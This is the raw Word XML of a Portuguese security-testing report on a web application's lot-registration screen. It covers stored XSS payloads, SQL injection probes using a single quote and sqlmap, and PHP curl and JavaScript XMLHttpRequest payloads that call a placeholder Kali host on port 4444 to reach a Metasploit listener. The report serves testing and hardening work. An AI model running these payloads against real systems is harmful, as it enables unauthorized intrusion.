          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lo de sincronização de relógios                             </w:t>
      </w:r>
      <w:r w:rsidRPr="00F134D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usando UDP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007649FC" w:rsidRPr="00D56FE7" w:rsidRDefault="007649FC" w:rsidP="00F134D7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="993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D56FE7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0A57C9" w:rsidP="007649F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2 </w:t>
      </w:r>
      <w:r w:rsidR="007649FC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XSS – Cadastro Lotes </w:t>
      </w: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3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1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cobrir se os camp</w:t>
      </w:r>
      <w:r w:rsidR="007649FC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">os da tela de Cadastro Lotes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ão vulneráveis ao ataque XSS Armazenado. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A57C9" w:rsidRDefault="000A57C9" w:rsidP="000A57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0A57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serir em um dos campos o seguinte código:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B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&lt;script&gt; alert(“oi”);&lt;/script&gt; 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>no campo Marca/Fabricante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49317F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7649FC" w:rsidRPr="00D56FE7" w:rsidRDefault="007649FC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aso a aplicação não realize um tratamento adequado dos dados inseridos, ao serem carregados pelo banco de dados, esses dados devem produzir um pop-up com o texto “oi”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRPr="00D56FE7" w:rsidRDefault="00D46C6B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D46C6B" w:rsidRPr="00D56FE7" w:rsidRDefault="00D46C6B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49317F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Espera-se que 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 xml:space="preserve">o sistema realize um tratamento </w:t>
      </w:r>
      <w:r w:rsidR="00E04E3E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nos dados de entrada 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>e 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código</w:t>
      </w:r>
      <w:r w:rsidR="00AF04A2" w:rsidRPr="00D56FE7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E04E3E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inserido</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> não seja executado quando a página carregar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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49FC" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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19637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6071F5" w:rsidRPr="00D56FE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57B33" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conforme mostra a figura 15, f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 xml:space="preserve">oi constatado que a aplicação não está fazendo o tratamento adequado para a </w:t>
      </w:r>
      <w:r w:rsidR="0049317F" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inserção de códigos mal-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>intencionados nos campos da tela em questão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC1742" w:rsidRPr="00D56FE7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BC1742" w:rsidP="00EE2B5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4864" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D8126C2" wp14:editId="0EB8CF26">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>72390</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="3998595"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905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15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Resultado teste XS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7B33" w:rsidRPr="00D56FE7" w:rsidRDefault="00057B3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EE2B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B2991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 partir da máquina virtua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utilizada para tes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brir uma conexão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com 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>utilizan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m listener da ferramenta Metasploit para acessar o sistema operacional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da máquina </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRPr="00D56FE7" w:rsidRDefault="004B2991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bendo que o sistema utiliza </w:t>
      </w:r>
      <w:r w:rsidR="00A30A25">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a linguagem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP, </w:t>
      </w:r>
      <w:r w:rsidR="00A30A25">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os testes realizados na Sessão 2 e Sessão 3 utilizarão códigos PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRPr="00D56FE7" w:rsidRDefault="00D46C6B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Passos utilizados:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00EE2B51" w:rsidRDefault="008C6DC7" w:rsidP="00EE2B5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B51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizar o Metasploit para abrir um listener na porta 444 da máquina virtual </w:t>
      </w:r>
      <w:r w:rsidR="00D349CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizada para testes</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2B51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, usando o exploit disponível em Auxiliary/Multi/Handler;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00EE2B51" w:rsidRDefault="008C6DC7" w:rsidP="00EE2B51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E2B51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Usar um comando GET de Javascript para abrir a conexão da máquina que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00EE2B51">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado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com a máquina virtual </w:t>
      </w:r>
      <w:r w:rsidR="00D349CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizada para testes</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2B51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8C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00A40129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omando a ser utilizado no XSS, o código abaixo tenta abrir uma conexão do tipo ‘GET’ com IP_do_</w:t>
      </w:r>
      <w:r w:rsidR="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali_linux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porta 4444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&lt;?php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$curl = curl_init('http://IP_do_</w:t>
      </w:r>
      <w:r w:rsidR="00A5289A" w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali_linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:4444'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exec($curl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curl_close($curl)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?&gt;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aso n</w:t>
      </w:r>
      <w:r w:rsidR="003E4BBF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ão haja o devido tratamento, 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listener do Metasploit aberto na porta 444 deve criar uma conexão entre a máquina </w:t>
      </w:r>
      <w:r w:rsidR="001E28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hospeda 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plic</w:t>
      </w:r>
      <w:r w:rsidR="001E28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ação e a máquina utilizada para teste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E4BBF" w:rsidRPr="00D56FE7" w:rsidRDefault="003E4BBF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E4BBF" w:rsidRPr="00D56FE7" w:rsidRDefault="003E4BBF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56FE7" w:rsidRPr="00D56FE7" w:rsidRDefault="00D56FE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:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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3E4BBF" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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EE2B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sessão do Meterpreter</w:t>
      </w:r>
      <w:r w:rsidR="004D25DD" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, conceito abordado no subcapítulo 3.2</w:t>
      </w:r>
      <w:r w:rsidR="007A267D" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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não foi abert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A267D" w:rsidRPr="00D56FE7" w:rsidRDefault="007A267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3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lterar o comando utilizado na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00B770F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00B770F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2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a tentar descobrir o que impediu a sessão do Meterpreter ser aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A40129" w:rsidRPr="00D56FE7" w:rsidRDefault="00A40129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D56FE7" w:rsidRDefault="00A40129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</w:t>
      </w:r>
      <w:r w:rsidR="00D46C6B" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ódig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baixo tenta abrir uma conexão com o IP_do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>_</w:t>
      </w:r>
      <w:r w:rsidR="00546C53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali_li</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00546C53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nux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e caso haja u erro exibe o problema num pop-up.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&lt;?php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$curl = curl_init('http://IP_do_</w:t>
      </w:r>
      <w:r w:rsidR="00A5289A" w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali_linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:4444'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>if(!curl_exec($curl)){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D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>javascript:alert(curl_error($curl)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}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curl_close($curl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?&gt;</w:t>
      </w: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15B47" w:rsidRPr="00D56FE7" w:rsidRDefault="00415B4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aplicação deve realizar o tratamento para impedir o comando de ser executado.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5967D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0A25" w:rsidRDefault="00A30A25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0A25" w:rsidRDefault="00A30A25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48383A" w:rsidP="00B770F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4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0A25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Ao contrário das </w:t>
      </w:r>
      <w:r w:rsidR="004B2991">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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A30A25">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 e 3</w:t>
      </w:r>
      <w:r w:rsidR="004B2991">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, que utiliz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am códigos </w:t>
      </w:r>
      <w:r w:rsidR="00A30A25">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHP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qui </w:t>
      </w:r>
      <w:r w:rsidR="00A30A25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</w:t>
      </w:r>
      <w:r w:rsidR="004B2991">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dos códigos de Javascript puro. </w:t>
      </w:r>
      <w:r w:rsidR="00A30A25">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Uma vez que, c</w:t>
      </w:r>
      <w:r w:rsidR="004B2991">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ódigos Javascript podem ser lidos por qualque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vegador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E2559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537F7B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ódigo abaixo cria um objeto do tipo XMLHttpReques</w:t>
      </w:r>
      <w:r w:rsidR="006E2559" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t e tenta realizar uma chamada A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jax do tipo GET para</w:t>
      </w:r>
      <w:r w:rsidR="006E2559" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidR="00881DA5" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP_do</w:t>
      </w:r>
      <w:r w:rsidR="00A5289A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali_linux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porta 4444, de forma síncrona.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881DA5" w:rsidRPr="00D56FE7" w:rsidRDefault="00881DA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&lt;script&gt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 xml:space="preserve">r = new XMLHttpRequest(); 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r.open("GET",’http://IP_do</w:t>
      </w:r>
      <w:r w:rsidR="00A5289A" w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_kali_linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:4444’,false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r.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00B77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&lt;/script&gt;</w:t>
      </w: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31790" w:rsidRPr="00D56FE7" w:rsidRDefault="00E31790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esperado é que a aplicação realize tratamento para impedir o código de ser executado. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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1CBE" w:rsidRDefault="001A1CBE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1CBE" w:rsidRDefault="001A1CBE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1790" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00D76012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="00557D26" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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Independente da sessão do Meterpreter não ser aberta, o código conseguiu ser inserido e executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00D56FE7" w:rsidRDefault="00751591" w:rsidP="00B770F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E317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31790" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.3.3.3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C</w:t>
      </w:r>
      <w:r w:rsidR="0049098B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adastro Lotes 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– Exploração via SQL Injection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22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entar realizar consultas não autorizadas no banco de dados por meio da injeção de SQL nos cam</w:t>
      </w:r>
      <w:r w:rsidR="0049098B" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pos da tela de Cadastro Lote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2C07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Default="008C6DC7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cobrir se o campo Marca/Fabricante é vulnerável a SQL Injection através das aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00361C8E" w:rsidRPr="00D56FE7" w:rsidRDefault="00361C8E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</w:t>
      </w:r>
      <w:r w:rsidR="0049098B"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 utilizado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: 1 ‘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DF35C8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al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um campo para SQL Injection. Imagina-se que haja por baixo uma instrução SQL que possua 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where param1 = &lt;parametro_na_interface&gt; and … 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aso a aplicação não fizesse o devido tratamento do comando inserido e a instrução fosse ser modificada para </w:t>
      </w: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where param1  = 1 ‘ . </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O que ocasionaria um erro de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1CBE" w:rsidRPr="00D56FE7" w:rsidRDefault="001A1CBE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D56FE7" w:rsidRDefault="00D46C6B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3F0DBB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D46C6B" w:rsidRPr="00D56FE7" w:rsidRDefault="00D46C6B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realize o tratamento dos caracteres para impedir que sejam interpretados como</w:t>
      </w:r>
      <w:r w:rsidR="006C08DA" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> trecho da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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Pr="00D56FE7" w:rsidRDefault="005967D5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361C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594AD8" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Colocando 1‘ n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Marca/Fabrican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098B" w:rsidRPr="00D56FE7" w:rsidRDefault="004909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a fe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 xml:space="preserve">rramenta Sqlmap para realizar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teste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s de injeção de SQL na página Cadastro Lotes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00C52795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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Através da ferramenta Burp Suite, capturar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a requisição POST </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realizada para o acesso à página em questão e salva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em um arquivo a parte par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que esses dados possam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ser utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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elo Sqlmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>posteriormente. [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2]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B005A4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>Comando utilizado: sqlmap -r params -p --current-db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1369" w:rsidRPr="00D56FE7" w:rsidRDefault="00771369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sqlmap” executa a ferramenta Sqlmap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param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“-p” indica o parâmetro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>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r injetado</w:t>
      </w:r>
      <w:r w:rsidR="007E2011" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pelo Sqlmap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, que nesse caso corresponde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a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 xml:space="preserve"> um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parâmetro de entrada de dados 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>utilizado pela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 tela</w:t>
      </w:r>
      <w:r w:rsidR="00C306C8" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> explorada</w:t>
      </w:r>
      <w:r w:rsidR="00C52795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-current-db” solicita que o Sqlmap que tente descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD" w:rsidRPr="00D56FE7" w:rsidRDefault="00190AAD" w:rsidP="00B005A4">
      <w:p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0AAD" w:rsidRPr="00D56FE7" w:rsidRDefault="00190AAD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0AAD" w:rsidRPr="00D56FE7" w:rsidRDefault="00190AAD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>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parâmetr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>s</w:t>
      </w:r>
      <w:r w:rsidR="003F0DBB" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, não permitindo que eles sejam vulneráveis à injeção de SQL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2992" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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rro na ferramenta. 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 xml:space="preserve">O parâmetro não foi indicado corretamente no comando utilizado. Dessa forma, o </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sqlmap não reconhece</w:t>
      </w:r>
      <w:r w:rsidR="00FD3807" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u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o parâmetro, que está no arquivo </w:t>
      </w:r>
      <w:r w:rsidR="002C07B9" w:rsidRPr="00D56FE7">
        <w:rPr>
